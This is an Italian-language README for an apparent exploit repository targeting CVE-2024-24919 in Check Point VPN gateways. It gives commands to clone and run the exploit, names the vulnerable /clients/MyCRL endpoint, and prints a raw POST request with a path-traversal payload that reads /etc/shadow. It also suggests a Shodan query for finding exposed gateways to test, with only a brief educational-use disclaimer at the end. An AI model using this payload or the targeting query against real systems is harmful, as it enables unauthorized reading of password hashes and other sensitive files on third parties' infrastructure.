
CVE-2024-24919 Exploit e PoC - LFI critico per VPN di accesso remoto o Accesso mobile.
Questo repository contiene un exploit in Python per la CVE-2024-24919, una vulnerabilità che permette di leggere file sensibili dalla pagina vulnerabile.
Questo exploit controlla innanzitutto se il target è vulnerabile, quindi recupera il percorso specificato.
Gravità: Critica
Prima clona il repository:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
Assegna i permessi ed esegui l'exploit con python3
chmod +x exploit.py
python3 exploit.py
Quindi segui i passaggi e otterrai i dati del file specificato
Se hai difficoltà, assicurati che l'URL specificato sia quello principale
✓ https://google.com
✘ https://google.com/search?client=firefox
Per prima cosa dobbiamo assicurarci che il sito web abbia Check Point Security Gateways con VPN di accesso remoto o software di accesso mobile abilitati.
In questo exploit puntiamo all'endpoint {ip}/clients/MyCRL.
Questo endpoint è vulnerabile se effettuiamo una richiesta POST, aggiungendo la stringa CSHELL/ e il percorso del file che vogliamo leggere utilizzando un Path Traversal.
La richiesta sarà simile a questa:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
Abbiamo ottenuto tutto questo analizzando il codice sorgente
Per maggiori informazioni sul processo, consulta questo post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
Se vuoi testare questa vulnerabilità, puoi usare Shodan per trovare siti web vulnerabili, utilizzando questa query su Shodan
Server: “Check Point SVN Foundation”
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
Questo script è solo a scopo educativo. Usalo in modo responsabile e solo su sistemi per cui hai il permesso di accedere.